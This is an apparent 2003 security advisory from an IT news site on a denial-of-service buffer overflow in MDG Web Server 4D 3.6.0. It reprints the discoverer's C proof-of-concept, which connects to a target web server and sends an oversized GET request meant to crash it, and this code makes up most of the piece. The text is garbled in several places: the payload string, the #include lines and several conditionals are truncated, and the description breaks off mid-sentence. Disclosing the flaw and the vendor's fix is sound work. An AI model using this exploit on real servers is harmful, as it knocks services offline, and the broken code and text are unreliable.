Denial of Service (DoS) in MDG Web Server 4D Version 3.6.0
A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system.
Ken Pfeil
May 6, 2003
3 Min Read
Reported April 30, 2003, by Tom Ferris.
VERSIONS AFFECTED
MDG Web Server 4D 3.6.0
DESCRIPTION
A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. By issuing a GET / request with 4096 caret brackets (
DEMONSTRATION
The discoverer posted the following code as proof of concept:
/* Web Server 4D 3.6.0 DoS
*
* Vulnerable systems:
* Web Server 4D 3.6.0 DoS
* Vendor:
* http://www.mdg.com/
*
* Download it here:
* ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
*
* Written and found by badpack3t
* For SP Research Labs
* 04/29/2003
*
* www.security-protocols.com
*
* usage:
* sp-ws4d [targetport] (default is 80)
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET /
"
"
"
"
"
"
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target, buffer[30000];
int port,bufsize;
SOCKET mysocket;
if (argc
{
printf("Web Server 4D 3.6.0 DoSr rr", argv[0]);
printf("Tool Usage:r %s [targetport] (default is 80)rr", argv[0]);
printf("www.security-protocols.comrr", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData)
target = argv[1];
//for default web attacks
port = 80;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket
INVALID_SOCKET)
{
printf("Socket error!r");
exit(1);
}
printf("Resolving Hostnames...");
if ((pTarget = gethostbyname(target)) NULL)
{
printf("Resolve of %s failed", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.");
exit(1);
}
printf("Connected!...");
printf("Sending Payload...");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payloadr");
closesocket(mysocket);
exit(1);
}
printf("Remote Webserver has been DoS'ed r");
closesocket(mysocket);
WSACleanup();
return 0;
}
VENDOR RESPONSE
MDG has released version 3.6.1 of the product. The vendor reports that this version is no longer vulnerable.
CREDI
Discovered byTom Ferris.
About the Author
Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
You May Also Like